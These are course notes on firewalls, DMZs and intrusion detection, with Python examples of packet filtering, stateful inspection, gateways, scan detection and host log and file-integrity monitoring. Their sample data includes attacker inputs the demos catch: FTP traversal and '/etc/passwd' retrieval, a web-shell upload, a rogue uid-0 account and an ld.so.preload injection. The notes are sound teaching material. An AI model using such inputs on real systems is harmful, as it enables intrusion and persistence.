Unit 4: Firewall & Intrusion Detection System (Total Marks: 18)
Topics and Sub-topics
4.1 Firewall: Need of Firewall, Types of Firewall - Packet filters,
Stateful Packet Filters, Application Gateways, Circuit Gateways.
4.2 Firewall Policies, configuration, limitations, DMZ
4.3 Intrusion Detection System: Vulnerability Assessment, Misuse
detection, Anomaly Detection, Network Based IDS, Host Based
IDS, Honeypots.
4.1 Firewall:
• A firewall is a network security device, either hardware- or software-based, that
monitors and filters incoming and outgoing network traffic based on an
organization's previously established security policies.
• For each packet it accepts, rejects or drops the traffic:
• Accept: allow the traffic through.
• Reject: block the traffic but send an error back to the sender (an ICMP unreachable
message or, for TCP, a reset).
• Drop: block the traffic silently, with no reply.
• A firewall establishes a barrier between a secured internal network and an untrusted
outside network, such as the Internet.
• A firewall’s main purpose is to allow non-threatening traffic in and to keep
dangerous traffic out.
4.1.1 Need of Firewall:
• Connectivity to the Internet is no longer optional for organizations.
• While Internet access benefits the organization, it also lets the outside world reach
the organization's internal network, and that creates a threat.
• In order to secure the internal network from unauthorized traffic, we need a
Firewall.
4.1.2 Types of Firewall:
• List of types of firewall:
1. Packet filter as a firewall
2. Hardware Firewall
3. Software Firewall
4. Circuit level gateway firewall
5. Application level gateway firewall
6. Proxy server as a firewall
1. Packet Filtering Firewall
• A firewall works as a barrier, or a shield, between your PC and cyber space.
• When you are connected to the Internet, you are constantly sending and receiving
information in small units called packets.
• The firewall filters these packets to see if they meet certain criteria set by a series
of rules, and thereafter blocks or allows the data.
• This way, hackers cannot get inside and steal information such as bank account
• Working:-
1. A packet filtering router firewall applies a set of rules to each packet and, based on the
outcome, decides to either forward or discard the packet.
2. Such a firewall is implemented on a router configured to filter packets travelling in either
direction, i.e. from the local network to the outside world and vice versa.
3. A packet filter performs the following functions:
a. Receive each packet as it arrives.
b. Pass the packet through the set of rules, which are written in terms of the IP and
transport header fields of the packet (addresses, protocol, port numbers, flags). If the
packet matches one of the rules, accept or discard it as that rule says.
c. If no rule matches, take the default action: either discard all such packets (default deny,
the safer choice) or accept them all (default permit).
• Advantages: simplicity, transparency to the users, high speed
• Disadvantages: difficult to set up packet filtering rules, lack of authentication.
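The rule evaluation described above, as an added example (my code, not from the original notes): a first-match packet filter in Python over header fields, with an explicit default policy. The address ranges, the interface names and the rule set are constructed for illustration; the anti-spoofing rule goes slightly beyond the text and shows why a stateless filter also needs to know which interface a packet arrived on.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# Constructed packet model: only the header fields a packet filter looks at.
@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str          # "tcp", "udp" or "icmp"
    sport: int
    dport: int
    in_iface: str       # "inside" or "outside": the interface the packet arrived on

# One filtering rule. A field left at its default matches anything.
@dataclass(frozen=True)
class Rule:
    action: str                     # "accept", "reject" (block + error reply) or "drop" (block silently)
    proto: str = "any"
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    dport: Optional[int] = None
    in_iface: Optional[str] = None
    comment: str = ""

    def matches(self, pkt: Packet) -> bool:
        return (
            (self.proto == "any" or self.proto == pkt.proto)
            and ip_address(pkt.src) in ip_network(self.src)
            and ip_address(pkt.dst) in ip_network(self.dst)
            and (self.dport is None or self.dport == pkt.dport)
            and (self.in_iface is None or self.in_iface == pkt.in_iface)
        )

def filter_packet(rules: List[Rule], pkt: Packet, default: str = "drop") -> str:
    """First-match evaluation: the first rule whose fields match decides.
    If no rule matches, the default policy applies (default deny here)."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action
    return default

INTERNAL = "10.0.0.0/8"        # assumed internal address range
WEB_SERVER = "10.0.0.5/32"     # assumed public web server

# Constructed rule set for a border router. Order matters: the telnet drop must
# precede the broad "allow anything from inside" rule or it never fires.
RULES = [
    Rule("drop", src=INTERNAL, in_iface="outside", comment="anti-spoof: internal source arriving from outside"),
    Rule("drop", proto="tcp", dport=23, comment="no telnet in either direction"),
    Rule("accept", proto="tcp", dst=WEB_SERVER, dport=80, comment="public web"),
    Rule("accept", proto="tcp", dst=WEB_SERVER, dport=443, comment="public web (TLS)"),
    Rule("accept", src=INTERNAL, in_iface="inside", comment="anything initiated from inside"),
    Rule("reject", proto="tcp", dst=INTERNAL, dport=22, comment="tell outsiders ssh is closed"),
]

def verdicts(packets: List[Packet], rules: List[Rule] = RULES) -> List[str]:
    return [filter_packet(rules, p) for p in packets]

# Constructed sample traffic.
SAMPLE = [
    Packet("203.0.113.7", "10.0.0.5", "tcp", 51000, 80, "outside"),    # accept: public web
    Packet("203.0.113.7", "10.0.0.5", "tcp", 51001, 22, "outside"),    # reject: ssh from outside
    Packet("203.0.113.7", "10.0.0.9", "tcp", 51002, 8080, "outside"),  # drop: no rule, default deny
    Packet("10.0.0.9", "198.51.100.2", "tcp", 40000, 443, "inside"),   # accept: outbound
    Packet("10.0.0.9", "198.51.100.2", "tcp", 40001, 23, "inside"),    # drop: telnet
    Packet("10.0.0.9", "10.0.0.5", "tcp", 40002, 80, "outside"),       # drop: spoofed internal source
]

if __name__ == "__main__":
    for p, v in zip(SAMPLE, verdicts(SAMPLE)):
        print(f"{v:7} {p.proto} {p.src}:{p.sport} -> {p.dst}:{p.dport} via {p.in_iface}")
```

The "allow anything from inside" rule is exactly the kind of rule the disadvantages above warn about: without the interface check, a packet with a forged internal source address arriving from the Internet would match it, because a stateless filter has no way to authenticate a source address.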
2. Stateful Inspection Firewall:
• Stateful firewalls (which perform stateful packet inspection) can determine which
connection, and which state of that connection, a packet belongs to, which a plain packet
filter cannot; this makes them more effective.
• They keep track of the state of the network connections travelling across them, such as
TCP streams, so filtering decisions are based not only on the defined rules but also on the
packet's history, as recorded in the state table.
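To make the difference concrete, here is an added example (my code, not from the notes) that runs one packet sequence through the stateless "allow inbound packets with ACK set" rule and through a small state table keyed on the connection 4-tuple. Addresses, ports and the packet sequence are constructed; a real stateful firewall also ages entries out with timeouts, checks sequence numbers and keeps a short grace period after the close, all of which this omits.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, FrozenSet, List, Tuple

@dataclass(frozen=True)
class TcpPacket:
    src: str
    dst: str
    sport: int
    dport: int
    flags: FrozenSet[str]      # subset of {"SYN", "ACK", "FIN", "RST"}

INSIDE = ip_network("10.0.0.0/8")   # assumed internal range

def stateless_verdict(pkt: TcpPacket) -> str:
    """Classic stateless approximation of 'allow replies': anything from inside
    goes out, and inbound packets are allowed if ACK is set.  An attacker
    satisfies this rule simply by setting ACK on a probe."""
    if ip_address(pkt.src) in INSIDE:
        return "accept"
    return "accept" if "ACK" in pkt.flags else "drop"

class StatefulFirewall:
    def __init__(self) -> None:
        # State table keyed by the connection's original direction:
        # (client_ip, client_port, server_ip, server_port) -> state
        self.table: Dict[Tuple[str, int, str, int], str] = {}

    def process(self, pkt: TcpPacket) -> str:
        outbound = ip_address(pkt.src) in INSIDE
        key = ((pkt.src, pkt.sport, pkt.dst, pkt.dport) if outbound
               else (pkt.dst, pkt.dport, pkt.src, pkt.sport))
        state = self.table.get(key)
        if state is None:
            # Only a bare SYN from inside may open a new entry; an inbound packet
            # with no entry is unsolicited, whatever its flags say.
            if outbound and pkt.flags == frozenset({"SYN"}):
                self.table[key] = "SYN_SENT"
                return "accept"
            return "drop"
        if state == "SYN_SENT" and not outbound and {"SYN", "ACK"} <= pkt.flags:
            self.table[key] = "ESTABLISHED"
        self._track_close(key, pkt)
        return "accept"

    def _track_close(self, key, pkt: TcpPacket) -> None:
        if "RST" in pkt.flags:
            del self.table[key]                 # abort: entry removed immediately
        elif "FIN" in pkt.flags:
            if self.table[key] == "HALF_CLOSED":
                del self.table[key]             # second FIN: both sides finished
            else:
                self.table[key] = "HALF_CLOSED"

def pkt(src: str, sport: int, dst: str, dport: int, *flags: str) -> TcpPacket:
    return TcpPacket(src, dst, sport, dport, frozenset(flags))

# Constructed sequence: a normal HTTPS session from inside, an outsider's ACK-only
# probe and a plain SYN in the middle of it, then a clean close and a stray packet.
SEQUENCE = [
    pkt("10.0.0.9", 40000, "198.51.100.2", 443, "SYN"),
    pkt("198.51.100.2", 443, "10.0.0.9", 40000, "SYN", "ACK"),
    pkt("10.0.0.9", 40000, "198.51.100.2", 443, "ACK"),
    pkt("198.51.100.2", 443, "10.0.0.9", 40000, "ACK"),          # data from the server
    pkt("203.0.113.5", 4444, "10.0.0.9", 22, "ACK"),             # ACK-only probe (as in an ACK scan)
    pkt("203.0.113.5", 4445, "10.0.0.9", 22, "SYN"),             # plain inbound SYN
    pkt("10.0.0.9", 40000, "198.51.100.2", 443, "FIN", "ACK"),
    pkt("198.51.100.2", 443, "10.0.0.9", 40000, "FIN", "ACK"),
    pkt("198.51.100.2", 443, "10.0.0.9", 40000, "ACK"),          # late packet after the close
]

def compare(sequence: List[TcpPacket] = SEQUENCE) -> List[Tuple[str, str]]:
    """Return (stateless verdict, stateful verdict) per packet, in order."""
    fw = StatefulFirewall()
    return [(stateless_verdict(p), fw.process(p)) for p in sequence]

if __name__ == "__main__":
    for p, (sl, sf) in zip(SEQUENCE, compare()):
        print(f"{p.src}:{p.sport} -> {p.dst}:{p.dport} {sorted(p.flags)}  stateless={sl}  stateful={sf}")
```

Packets 5 and 9 are the ones that matter: both carry ACK and so pass the stateless rule, but neither belongs to a connection an inside host opened, so the state table drops them.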
3. Circuit level gateway Firewalls:
• A circuit-level gateway firewall provides security by relaying whole TCP (and, in some
products, UDP) connections rather than judging individual packets.
• It acts as a handshaking device between trusted clients or servers and untrusted hosts,
and vice versa.
• Circuit-level gateways work at the session layer of the OSI model. The gateway decides
whether a requested session is legitimate by checking the handshake between the two
endpoints, not by inspecting the data the session carries.
• Traffic that passes through a circuit-level gateway to a remote computer appears to
originate from the gateway itself, which hides the addresses of the hosts in the protected
network. Circuit-level gateways are not expensive.
• The components used to define a valid session in a circuit-level gateway are:
• The destination and source addresses and ports.
• The time of day.
• The protocol being used.
• The user and the password.
• Working:
• A circuit-level gateway sets up two TCP connections: one between the gateway and the
inner host, and one between the gateway and the outer host.
• Once both connections are established, the gateway relays TCP segments from one to the
other without examining their contents.
• The circuit-level gateway maintains a virtual circuit table used to validate connections: a
network packet is relayed only when its addresses and ports match an entry in the table.
When the connection terminates, the gateway removes that entry and the virtual circuit
between the two nodes is closed.
• Once a session is permitted, a circuit-level gateway performs no further checks on the
individual packets.
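The two-connection relay and the virtual circuit table, as an added runnable example (my code, not from the notes): a minimal circuit-level gateway on the loopback interface. The "outer host" is a constructed stand-in that answers in upper case, the trusted range is assumed to be 127.0.0.0/8, and the gateway copies bytes without parsing them. Ports are chosen by the OS, so the demo is self-contained.

```python
import socket
import threading
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple

def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until EOF, then half-close the other side.  The gateway
    never parses what it copies: that is what makes it circuit-level rather
    than application-level."""
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)
    try:
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass            # peer already gone

class CircuitGateway:
    def __init__(self, target: Tuple[str, int], trusted_net: str) -> None:
        self.target = target                          # the outer host (addr, port)
        self.trusted = ip_network(trusted_net)        # inner hosts allowed to open circuits
        self.circuits: Dict[Tuple[str, int], Tuple[str, int]] = {}   # virtual circuit table
        self.rejected: List[Tuple[str, int]] = []
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
        self.listener.listen(5)

    @property
    def port(self) -> int:
        return self.listener.getsockname()[1]

    def serve_one(self) -> None:
        """Accept one inner-host connection and relay it as a virtual circuit."""
        client, addr = self.listener.accept()
        if ip_address(addr[0]) not in self.trusted:   # session validation: who may connect
            self.rejected.append(addr)
            client.close()
            return
        server = socket.create_connection(self.target)  # second TCP connection: gateway -> outer host
        self.circuits[addr] = self.target               # record the circuit in the table
        pumps = [threading.Thread(target=_pump, args=(client, server)),
                 threading.Thread(target=_pump, args=(server, client))]
        for t in pumps:
            t.start()
        for t in pumps:
            t.join()
        client.close()
        server.close()
        del self.circuits[addr]                         # circuit torn down, entry removed

def run_demo() -> dict:
    # Constructed stand-in for the outer host: answers one request in upper case.
    upstream = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    upstream.bind(("127.0.0.1", 0))
    upstream.listen(1)

    def answer_once() -> None:
        conn, _ = upstream.accept()
        with conn:
            conn.sendall(conn.recv(4096).upper())
        upstream.close()

    threading.Thread(target=answer_once, daemon=True).start()
    gw = CircuitGateway(upstream.getsockname(), "127.0.0.0/8")
    worker = threading.Thread(target=gw.serve_one, daemon=True)
    worker.start()

    # The inner host talks to the gateway's port, never to the outer host directly.
    with socket.create_connection(("127.0.0.1", gw.port)) as inner:
        inner.sendall(b"get /index.html")
        inner.shutdown(socket.SHUT_WR)
        reply = b"".join(iter(lambda: inner.recv(4096), b""))
    worker.join(timeout=5)
    gw.listener.close()
    return {"reply": reply, "open_circuits": len(gw.circuits), "rejected": len(gw.rejected)}

if __name__ == "__main__":
    print(run_demo())
```

Note what the gateway does not do: it never looks at `get /index.html`, so an application-level attack inside an accepted session passes straight through. That is the trade-off the next section's application-level gateway addresses.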
4. Application level gateway Firewalls:
• An application-level gateway is normally run on a bastion host, a hardened machine that is
exposed to the untrusted network. It operates at the application layer. Multiple application
gateways can run on the same host, but each gateway is a separate server with its own
processes.
• These firewalls, also known as application proxies, provide the most secure type of data
connection because they can examine every layer of the communication, including the
application data.
• Example: consider the FTP service. FTP commands include getting a file, putting a file,
listing files, and moving to a particular point in the directory tree. A system administrator
may block the put command but permit get, allow listing of only certain files, or prohibit
changing out of a particular directory. The proxy server simulates both sides of the protocol
exchange: for example, the proxy might accept get commands and reject put commands.
• It works as follows:
Step-1: The user contacts the application gateway using an application protocol such as
HTTP, FTP or Telnet.
Step-2: The application gateway asks the user for the remote host with which the user
wants to establish a connection. It also asks for the user id and password required to use
the services of the application gateway.
Step-3: After verifying the user's identity, the application gateway connects to the remote
host on behalf of the user and relays the data in both directions.
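The per-command policy from the FTP example and the three steps above, as an added example (my code, not the notes'): the control-connection side of an FTP application proxy that parses each command and either forwards it or answers the client itself. The jail directory /pub, the denied file and the sample session are constructed; the data connections and the real server are left out.

```python
import posixpath
from dataclasses import dataclass, field
from typing import List, Set, Tuple

Decision = Tuple[str, str]    # ("forward", command sent on) or ("reply", response the proxy sends)

@dataclass
class FtpControlProxy:
    """Application-level policy for one FTP control connection.  Every command
    is parsed; the proxy relays it to the real server only if policy allows,
    otherwise it answers the client with an FTP error code itself."""
    jail: str = "/pub"                           # assumed: user may never leave this tree
    cwd: str = "/pub"
    allow_download: bool = True
    allow_upload: bool = False
    denied_files: Set[str] = field(default_factory=lambda: {"/pub/internal.txt"})
    log: List[Tuple[str, Decision]] = field(default_factory=list)

    PASS_THROUGH = {"USER", "PASS", "PWD", "TYPE", "PASV", "PORT", "QUIT", "NOOP", "SYST"}
    WRITES = {"STOR", "APPE", "DELE", "RNFR", "RNTO", "MKD", "RMD"}

    def _resolve(self, arg: str) -> str:
        path = arg if arg.startswith("/") else posixpath.join(self.cwd, arg or ".")
        return posixpath.normpath(path)          # collapses "..", the traversal vector

    def _inside_jail(self, path: str) -> bool:
        return path == self.jail or path.startswith(self.jail + "/")

    def handle(self, line: str) -> Decision:
        verb, _, arg = line.strip().partition(" ")
        decision = self._decide(verb.upper(), arg.strip())
        self.log.append((line.strip(), decision))
        return decision

    def _decide(self, verb: str, arg: str) -> Decision:
        if verb in self.PASS_THROUGH:
            return ("forward", f"{verb} {arg}".strip())
        if verb in ("CWD", "LIST", "NLST", "RETR"):
            target = self._resolve(arg)
            if not self._inside_jail(target):
                return ("reply", "550 Access denied by proxy")
            if verb == "CWD":
                self.cwd = target
            elif verb == "RETR" and (not self.allow_download or target in self.denied_files):
                return ("reply", "550 Download not permitted by proxy")
            # forward the canonical absolute path so the proxy's view of the
            # working directory cannot drift from the server's
            return ("forward", f"{verb} {target}")
        if verb in self.WRITES:
            if self.allow_upload:
                return ("forward", f"{verb} {arg}".strip())
            return ("reply", "550 Upload not permitted by proxy")
        return ("reply", "502 Command not implemented by proxy")   # default deny

# Constructed session: an authenticated user probing the policy.
SESSION = [
    "USER alice", "PASS hunter2", "CWD docs", "LIST", "RETR report.pdf",
    "RETR ../internal.txt", "CWD ../../etc", "RETR /etc/passwd",
    "STOR shell.php", "SITE EXEC id", "QUIT",
]

def run_session(commands: List[str] = SESSION) -> List[Decision]:
    proxy = FtpControlProxy()
    return [proxy.handle(c) for c in commands]

if __name__ == "__main__":
    for cmd, (what, detail) in zip(SESSION, run_session()):
        print(f"{cmd:22} -> {what:8} {detail}")
```

Unknown commands are refused rather than forwarded: an application proxy that only blocks a list of bad verbs would pass through anything it has never heard of.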
4.1.3 Limitations of Firewall:
1. Complexity: Setting up and keeping up a firewall can be time-consuming and
difficult, especially for bigger networks or companies with a wide variety of
users and devices.
2. Limited Visibility: Firewalls may not be able to identify or stop security risks
that operate at other levels, such as the application or endpoint level, because
they can only observe and manage traffic at the network level.
3. False sense of security: Some businesses may place an excessive amount of
reliance on their firewall and ignore other crucial security measures like endpoint
security or intrusion detection systems.
4. Limited adaptability: Because firewalls are frequently rule-based, they might
not be able to respond to fresh security threats.
5. Performance impact: Network performance can be significantly impacted by
firewalls, particularly if they are set up to analyze or manage a lot of traffic.
6. Limited scalability: Because firewalls are only able to secure one network,
businesses that have several networks must deploy many firewalls, which can be
expensive.
7. Limited VPN support: Some firewalls might not allow complex VPN features
like split tunneling, which could restrict the experience of a remote worker.
8. Cost: Purchasing many devices or add-on features for a firewall system can be
expensive, especially for businesses.
4.2 DMZ (Demilitarized zone)
• It is a computer host or a small network inserted as a neutral zone between a
company's private network and the outside public network. It prevents direct access
to a server that holds company data.
• It stops outside users from getting direct access to the company's data servers.
• A DMZ is an optional but more secure addition to a firewall design; the DMZ host
effectively acts as a proxy server.
• In the typical DMZ configuration a separate computer or host in the network receives
requests from users within the private network to access web sites or the public
network.
• The DMZ host then initiates sessions for such requests on the public network, but it is
not able to initiate a session back into the private network. It can only forward packets
that have been requested by an internal host.
• Users on the public network outside the company can access only the DMZ host. It can
store the company's web pages, which are served to outside users.
• Hence, the DMZ gives no access to the rest of the company's data. If an outsider does
penetrate the DMZ's security, the web pages may get corrupted, but the rest of the
company's information stays safe.
4.3.1 Intrusion Detection System(IDS):
• Intrusion detection is the process of monitoring the events occurring in a computer
system or network and analyzing them for signs of possible incidents, i.e. threats to
computer security.
• An intrusion detection system (IDS) is a device or software application that monitors
network or system activities for malicious activities or policy violations and produces
reports to a management station.
• IDS come in a variety of “flavors” and approach the goal of detecting suspicious
traffic in different ways.
• Figure: Intrusion Detection System
• IDS have following logical components:
1. Traffic collection: collects activity, as events, for the IDS to examine. On a host-based
IDS this can be log files, audit logs, or traffic coming to or leaving the system.
• On a network-based IDS this is typically a mechanism for copying traffic off a network
link (a mirror/SPAN port or a network tap).
2. Analysis engine: examines the collected traffic and compares it with the known patterns
of suspicious or malicious activity stored in the signature database. The analysis engine
acts as the brain of the IDS.
3. Signature database: a collection of patterns and definitions of known suspicious or
malicious activity.
4. User interface and reporting: interfaces with the human element, raising alerts when
appropriate and giving the user a means to interact with and operate the IDS.
• IDS are mainly divided into two categories, depending on what they monitor:
1) Host-based IDS: a host-based IDS looks for activities such as the following in log files:
1. Logins at odd hours
2. Login authentication failures
3. Adding a new user account
4. Modification or access of critical system files
5. Modification or removal of binary files
6. Starting or stopping processes
7. Privilege escalation
8. Use of certain programs
2) Network-based IDS: a network-based IDS looks for activities such as:
1. Denial of service attacks
2. Port scans or sweeps
3. Malicious content in the data payload of packets
4. Vulnerability scanning
5. Trojans, viruses or worms
6. Tunneling
7. Brute force attacks
4.3.2 Types of Intrusion Detection System(IDS):
1. Network Intrusion Detection System (NIDS):
• Network intrusion detection systems (NIDS) are set up at a planned point within
the network to examine traffic from all devices on the network.
• It performs an observation of passing traffic on the entire subnet and matches
the traffic that is passed on the subnets to the collection of known attacks. Once
an attack is identified or abnormal behavior is observed, the alert can be sent to
the administrator.
• An example of a NIDS is installing it on the subnet where firewalls are located in
order to see if someone is trying to crack the firewall.
• Figure: NIDS
• Advantages of Network-based Intrusion Detection Systems
• The deployment of network-based IDSs is usually easy with minimal effort.
• Network-based IDSs can be made very secure and are often invisible to most attackers,
since a sensor that only listens on a tap or mirror port sends no traffic of its own.
• They can monitor a heterogeneous set of hosts and operating systems
simultaneously, due to the fact that standard network protocols (e.g. TCP, UDP
and IP) are supported and used by most major operating systems.
• Disadvantages of Network-based Intrusion Detection Systems
• Network-based IDSs cannot analyze encrypted information. This problem is
increasing as more organizations and attackers use virtual private networks, which
normally utilize encrypted information.
• The processing load in a large or busy network may cause significant difficulties to
the analysis engine part of the IDS. This condition (high processing load) can
seriously limit an IDS’s ability to detect attacks when the network load is above a
specific amount of network traffic. Although some vendors have adopted
hardware-based solutions for IDSs, to increase the speed of their processing
capability (and the cost of implementation), the limitation still remains.
• The need to analyze packets as fast as possible forces developers to check for fewer
attack patterns. Thus detection effectiveness is often compromised for the sake of cost
effectiveness.
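The port scans and sweeps from the NIDS activity list, as an added example (my code, not the notes'): a detector that keeps a sliding window of connection attempts per source and alerts when one source touches many ports on one host (scan) or one port on many hosts (sweep). The flow records are constructed, the thresholds and the 10-second window are assumptions, and the last batch of traffic shows the classic weakness: a scan slowed down to one port a minute stays under the window and is never flagged.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Set, Tuple

@dataclass(frozen=True)
class Attempt:          # one connection attempt (e.g. a TCP SYN) seen on the wire
    ts: float           # seconds
    src: str
    dst: str
    dport: int

Alert = Tuple[str, str, str]   # (kind, source, detail)

class ScanDetector:
    def __init__(self, window: float = 10.0, scan_ports: int = 10, sweep_hosts: int = 5) -> None:
        self.window = window            # assumption: seconds of history kept per source
        self.scan_ports = scan_ports    # distinct ports on one host -> port scan
        self.sweep_hosts = sweep_hosts  # one port on this many hosts -> port sweep
        self.recent: Dict[str, Deque[Attempt]] = defaultdict(deque)
        self.alerts: List[Alert] = []
        self._raised: Set[Tuple[str, str]] = set()   # one alert per (kind, source)

    def observe(self, a: Attempt) -> None:
        q = self.recent[a.src]
        q.append(a)
        while q and a.ts - q[0].ts > self.window:   # expire attempts older than the window
            q.popleft()
        ports_on_dst = {x.dport for x in q if x.dst == a.dst}
        hosts_on_port = {x.dst for x in q if x.dport == a.dport}
        if len(ports_on_dst) >= self.scan_ports:
            self._raise("port scan", a.src, f"{len(ports_on_dst)} ports on {a.dst} within {self.window}s")
        if len(hosts_on_port) >= self.sweep_hosts:
            self._raise("port sweep", a.src, f"port {a.dport} on {len(hosts_on_port)} hosts within {self.window}s")

    def _raise(self, kind: str, src: str, detail: str) -> None:
        if (kind, src) not in self._raised:
            self._raised.add((kind, src))
            self.alerts.append((kind, src, detail))

def constructed_traffic() -> List[Attempt]:
    flows: List[Attempt] = []
    # a normal client: a few connections to the web server over a minute
    for i, port in enumerate([443, 443, 80, 443, 443]):
        flows.append(Attempt(i * 12.0, "10.0.0.9", "10.0.0.5", port))
    # a port scan: twelve ports on one host in three seconds
    for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3389, 8080]):
        flows.append(Attempt(30.0 + i * 0.25, "203.0.113.9", "10.0.0.5", port))
    # a sweep: port 445 on six hosts in two seconds
    for i in range(1, 7):
        flows.append(Attempt(40.0 + i * 0.3, "198.51.100.5", f"10.0.0.{i}", 445))
    # the same scan slowed to one port per minute: evades the fixed window
    for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3389, 8080]):
        flows.append(Attempt(100.0 + i * 60.0, "203.0.113.10", "10.0.0.5", port))
    return sorted(flows, key=lambda f: f.ts)

def analyze(flows: List[Attempt]) -> List[Alert]:
    det = ScanDetector()
    for f in flows:
        det.observe(f)
    return det.alerts

if __name__ == "__main__":
    for kind, src, detail in analyze(constructed_traffic()):
        print(f"ALERT {kind}: {src} {detail}")
```

Lengthening the window catches slower scans at the cost of memory per source and more false positives from busy legitimate clients; that tension is the "processing load" trade-off described in the disadvantages above.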
2. Host Based Intrusion Detection System (HIDS):
• Host intrusion detection systems (HIDS) run on independent hosts or devices on the
network.
• A HIDS monitors the incoming and outgoing packets from the device only and will alert the
administrator if suspicious or malicious activity is detected.
• It takes a snapshot of existing system files and compares it with the previous snapshot.
If critical system files were edited or deleted, an alert is sent to the administrator to
investigate.
• An example of HIDS usage can be seen on mission-critical machines, which are not
expected to change their layout.
• A HIDS looks for activities such as the following in log files:
• Logins at odd hours
• Login authentication failure
• Adding new user account
• Modification or access of critical system files
• Modification or removal of binary files
• Starting or stopping processes
• Privilege escalation
• Use of certain programs
• Figure: HIDS
• Advantages:
1. Operating-system-specific and detailed signatures.
2. Examines data after it has been decrypted.
3. Application-specific.
4. Can determine whether an alarm actually affects that specific host.
• Disadvantages:
1. Needs a process on every system to be watched.
2. High cost of ownership and maintenance.
3. Uses local system resources.
4. If logs are kept locally, they can be compromised or disabled by an attacker.
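The log-file checks in the list above (the same list appears under 4.3.1) and the snapshot comparison described earlier in this section, as one added example (my code, not from the notes). The auth-log excerpt and the file tree are constructed; the failure threshold and the "odd hours" range are assumptions. Both halves return their findings rather than printing them, so they can feed whatever alerting the IDS uses.

```python
import hashlib
import re
import tempfile
from collections import Counter
from pathlib import Path
from typing import Dict, List, Tuple

Alert = Tuple[str, str]   # (rule, detail)

# ---- Part 1: log-file rules -------------------------------------------------
LOG_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d+) (?P<hh>\d\d):\d\d:\d\d \S+ "
    r"(?P<prog>[\w-]+)(?:\[\d+\])?: (?P<msg>.*)$"
)

# Constructed auth-log excerpt (not from a real host).
SAMPLE_AUTH_LOG = """\
Mar 14 02:13:07 web1 sshd[4120]: Failed password for root from 198.51.100.23 port 51522 ssh2
Mar 14 02:13:09 web1 sshd[4120]: Failed password for root from 198.51.100.23 port 51523 ssh2
Mar 14 02:13:11 web1 sshd[4120]: Failed password for root from 198.51.100.23 port 51524 ssh2
Mar 14 02:13:12 web1 sshd[4121]: Failed password for admin from 198.51.100.23 port 51525 ssh2
Mar 14 02:13:14 web1 sshd[4121]: Failed password for admin from 198.51.100.23 port 51526 ssh2
Mar 14 02:14:01 web1 sshd[4133]: Accepted password for alice from 198.51.100.23 port 51530 ssh2
Mar 14 02:15:30 web1 useradd[4140]: new user: name=svc_backup, UID=1004, GID=1004, home=/home/svc_backup, shell=/bin/bash
Mar 14 09:02:11 web1 sshd[5010]: Accepted publickey for bob from 10.0.0.7 port 40022 ssh2
Mar 14 09:05:44 web1 sudo: bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/bash
"""

def analyze_log(text: str, fail_threshold: int = 5, odd_hours=range(0, 6)) -> List[Alert]:
    alerts: List[Alert] = []
    failures: Counter = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hour, prog, msg = int(m["hh"]), m["prog"], m["msg"]
        if prog == "sshd" and msg.startswith("Failed password"):
            src = re.search(r"from (\S+)", msg).group(1)
            failures[src] += 1
            if failures[src] == fail_threshold:          # fire once per source
                alerts.append(("login failure burst", src))
        elif prog == "sshd" and msg.startswith("Accepted") and hour in odd_hours:
            user = re.search(r"for (\S+)", msg).group(1)
            alerts.append(("login at odd hour", f"{user} at {hour:02d}h"))
        elif prog == "useradd" and msg.startswith("new user"):
            alerts.append(("new user account", re.search(r"name=(\w+)", msg).group(1)))
        elif prog == "sudo" and "USER=root" in msg and re.search(r"COMMAND=/bin/(ba)?sh$", msg):
            alerts.append(("privilege escalation to root shell", msg.split(" : ")[0].strip()))
    return alerts

# ---- Part 2: file integrity snapshot ----------------------------------------
def snapshot(root: Path) -> Dict[str, str]:
    """Map each file under root to the SHA-256 of its contents."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "removed": sorted(k for k in baseline if k not in current),
        "added": sorted(k for k in current if k not in baseline),
    }

def fim_demo() -> Dict[str, List[str]]:
    """Build a constructed mini filesystem, baseline it, tamper with it, diff it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "etc").mkdir()
        (root / "bin" / "ls").write_bytes(b"\x7fELF original ls")
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n")
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        baseline = snapshot(root)          # in practice: stored off-host or signed
        # constructed tampering: trojaned binary, extra uid-0 account, deleted file, new preload
        (root / "bin" / "ls").write_bytes(b"\x7fELF trojaned ls")
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\ntoor:x:0:0::/:/bin/sh\n")
        (root / "etc" / "hosts").unlink()
        (root / "etc" / "ld.so.preload").write_text("/tmp/evil.so\n")
        return compare(baseline, snapshot(root))

if __name__ == "__main__":
    for rule, detail in analyze_log(SAMPLE_AUTH_LOG):
        print(f"ALERT {rule}: {detail}")
    print(fim_demo())
```

Disadvantage 4 above applies directly to this code: if the baseline hashes and the logs live on the host being watched, an attacker with root can rewrite both, so the baseline should be kept off-host or signed.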
4.3.3 Vulnerability Assessment:
• A vulnerability assessment is a systematic review of security weaknesses in an
information system.
• It evaluates if the system is susceptible to any known vulnerabilities, assigns
severity levels to those vulnerabilities, and recommends remediation or
mitigation, if and whenever needed.
